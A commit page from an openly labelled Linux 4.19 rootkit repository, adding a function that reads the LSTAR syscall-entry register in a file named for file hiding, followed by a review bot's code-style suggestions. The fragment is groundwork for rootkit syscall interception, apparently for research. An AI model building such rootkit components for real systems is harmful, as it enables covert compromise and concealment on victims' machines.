linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit b799331bd6b2a52968cfd6de184f46c4e3f862e7
parent bee0bfad4b1de9ae0033b9128d1e86bde0101d83
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Fri,  1 Jan 2021 21:45:05 +0100

Add lstar reading

Diffstat:
Asrc/filehide_lstar.c | 38++++++++++++++++++++++++++++++++++++++
Asrc/filehide_lstar.h | 2++
2 files changed, 40 insertions(+), 0 deletions(-)

diff --git a/src/filehide_lstar.c b/src/filehide_lstar.c
@@ -0,0 +1,37 @@
+#include <linux/kernel.h>
+
+#include "filehide_lstar.h"
+#include "common.h"
+
+static unsigned long read_lstar(void);
+
+void
+test_lstar(void)
+{
+ unsigned long lstar = read_lstar();
+
+ DEBUG_INFO("LSTAR is %0lx\n", lstar);
+}
+
+static unsigned long
+read_lstar(void)
+{
+ unsigned int low, high;
+
+ __asm__ volatile (
+ "movl $0xc0000082, %%ecx\n\t" //https://elixir.bootlin.com/linux/v4.19/source/arch/x86/include/asm/msr-index.h#L15
+ "rdmsr\n\t"
+ "mov %%eax, %[low]\n\t"
+ "mov %%edx, %[high]"
+ : [low] "=r" (low), [high] "=r" (high)
+ :
+ : "ecx", "eax", "edx"
+ );
+
+ //Get two 32bit values into a 64bit variable
+ unsigned long ret = high;
+ ret <<= 32;
+ ret |= low;
+
+ return ret;
+}
+\ No newline at end of file
diff --git a/src/filehide_lstar.h b/src/filehide_lstar.h
@@ -0,0 +1 @@
+void test_lstar(void);
+\ No newline at end of file
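Review bot: The hand-rolled `rdmsr` sequence in read_lstar() duplicates a helper the 4.19 tree already ships, and hard-codes the MSR number that the very comment next to it links to a name for: `<asm/msr.h>` provides `rdmsrl(msr, val)` and `<asm/msr-index.h>` defines `MSR_LSTAR` as that constant, so the whole body reduces to `unsigned long ret; rdmsrl(MSR_LSTAR, ret); return ret;` with the 32-bit reassembly, the `movl` into `%ecx` and the clobber list gone. If the inline asm is kept for didactic reasons, the idiomatic form is `__asm__ volatile ("rdmsr" : "=a" (low), "=d" (high) : "c" (MSR_LSTAR));`, which lets the compiler place the operands instead of the two extra `mov`s, and a one-line comment should state the assumption that `unsigned long` is 64 bits (true on x86_64, where the `ret <<= 32` is meaningful). In test_lstar(), the format `%0lx` is a zero flag with no field width and so has no effect; if a fixed-width address dump is intended, `%016lx` is the specifier, assuming DEBUG_INFO from common.h forwards to a printk-style formatter, which is not visible in this hunk.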